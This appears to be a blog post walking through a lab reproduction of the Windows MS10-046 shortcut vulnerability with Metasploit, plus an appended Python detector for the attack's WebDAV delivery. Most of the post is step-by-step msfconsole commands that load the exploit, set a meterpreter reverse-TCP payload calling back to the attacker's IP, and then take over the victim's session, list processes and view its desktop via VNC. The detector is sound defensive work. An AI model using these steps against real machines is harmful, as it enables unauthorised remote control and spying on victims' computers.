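Reproducing the vulnerability
Commands:
msfconsole //start MSF (Metasploit)
search ms10-046 //search for the vulnerability
use windows/browser/ms10_046_shortcut_icon_dllloader //load the exploit module
set payload windows/meterpreter/reverse_tcp //set the payload to a reverse-connection shell
show options //view the relevant settings
set SRVHOST 192.168.1.10 //set the attacker's own IP
set LHOST 192.168.1.10 //set the IP the reverse connection calls back to (the attacker's own IP)
exploit //start running the exploit (run is equivalent)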
![Image [1] - Windows vulnerability MS10-046 test - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232152449.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
This generates a URL. Copy that address and test it on another machine running XP: opening it in a browser jumps to a shared folder.
![Image [2] - Windows vulnerability MS10-046 test - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232154406.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
Back in the MSF terminal, you can see that the exploit succeeded: there is a connected session with ID 1.
Commands:
sessions -l //list the existing sessions
sessions -i 1 //select session 1
![Image [3] - Windows vulnerability MS10-046 test - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232156353.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
Enter the ps command to view processes, or enter run vnc to view the remote desktop, and so on.
![Image [4] - Windows vulnerability MS10-046 test - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232158280.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
![Image [5] - Windows vulnerability MS10-046 test - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2022/04/20250305232200882.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
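A defender's view of the delivery step above, where the browser jumps to a shared folder, as an added example that is not from the original post: the function flags a client that fetches both a .lnk and a .dll from the same remote folder with a WebDAV user agent. That the shared folder is served over WebDAV is an assumption, and the log format, addresses and file names are constructed.

```python
import re
from collections import defaultdict

# Constructed proxy log lines: client, method, URL, "user agent".
# Format, addresses and file names are illustrative, not from the original post.
SAMPLE_LOG = """\
10.0.0.21 GET http://192.0.2.50/ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.21 PROPFIND http://192.0.2.50/share/ "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.21 GET http://192.0.2.50/share/a.lnk "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.21 GET http://192.0.2.50/share/a.dll "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.34 PROPFIND http://files.example.internal/docs/ "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.34 GET http://files.example.internal/docs/report.doc "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.40 GET http://example.com/setup.dll "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) (\S+) https?://([^/\s]+)(/\S*) "([^"]*)"$')


def find_lnk_dll_over_webdav(log_text):
    """Return sorted (client, server, folder) triples where a WebDAV client
    fetched both a .lnk and a .dll from the same remote folder."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        client, method, server, path, agent = m.groups()
        # Assumption: the share is browsed by the Windows WebDAV redirector.
        if "webdav" not in agent.lower():
            continue
        folder, _, name = path.rpartition("/")
        ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
        if method == "GET" and ext in ("lnk", "dll"):
            seen[(client, server, folder + "/")].add(ext)
    # Alert only when shortcut and DLL came from the same folder.
    return sorted(k for k, exts in seen.items() if exts == {"lnk", "dll"})


if __name__ == "__main__":
    for hit in find_lnk_dll_over_webdav(SAMPLE_LOG):
        print("ALERT lnk+dll over WebDAV:", hit)
```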